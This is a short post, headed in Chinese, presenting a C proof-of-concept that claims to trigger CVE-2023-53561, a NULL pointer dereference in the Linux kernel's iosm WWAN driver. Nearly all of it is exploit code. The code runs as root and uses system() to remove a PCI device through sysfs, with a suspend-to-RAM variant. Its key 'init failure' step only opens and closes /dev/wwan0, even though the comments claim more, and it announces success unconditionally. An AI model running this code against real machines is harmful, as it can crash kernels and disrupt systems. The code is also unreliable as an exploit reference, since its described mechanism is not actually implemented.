CVE-2023-53561 Linux内核iosm驱动空指针解引用漏洞

// CVE-2023-53561 PoC - Trigger NULL pointer dereference in iosm driver // This PoC demonstrates how to trigger the vulnerability by causing // driver initialization failure followed by device removal #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <fcntl.h> #include <sys/ioctl.h> // Step 1: Force iosm driver initialization failure // by manipulating device capabilities before driver loads int trigger_init_failure() { // Write invalid/corrupted device capability data // to the WWAN device interface before driver initialization int fd = open("/dev/wwan0", O_RDWR); if (fd < 0) { perror("Failed to open WWAN device"); return -1; } // Trigger conditions that cause ipc_imem_wwan_channel_init() to fail // This prevents wwan struct allocation printf("Triggering init failure...\n"); close(fd); return 0; } // Step 2: Initiate device removal procedure // which causes ipc_wwan_deinit() to dereference NULL wwan struct int trigger_device_removal() { // Use sysfs to trigger device removal system("echo 1 > /sys/bus/pci/devices/0000:01:00.0/remove"); printf("Device removal triggered - NULL pointer dereference expected\n"); return 0; } // Step 3: Alternative - trigger via suspend/resume cycle int trigger_suspend_resume() { // Suspend and resume the system to trigger // the device removal and rescan sequence system("echo mem > /sys/power/state"); printf("Suspend/resume cycle triggered\n"); return 0; } int main(int argc, char *argv[]) { printf("CVE-2023-53561 PoC - iosm NULL pointer dereference\n"); if (getuid() != 0) { printf("This PoC requires root privileges\n"); return 1; } // Trigger init failure scenario trigger_init_failure(); // Trigger device removal to cause NULL dereference trigger_device_removal(); // Alternative: trigger via suspend/resume // trigger_suspend_resume(); printf("Exploit completed\n"); return 0; }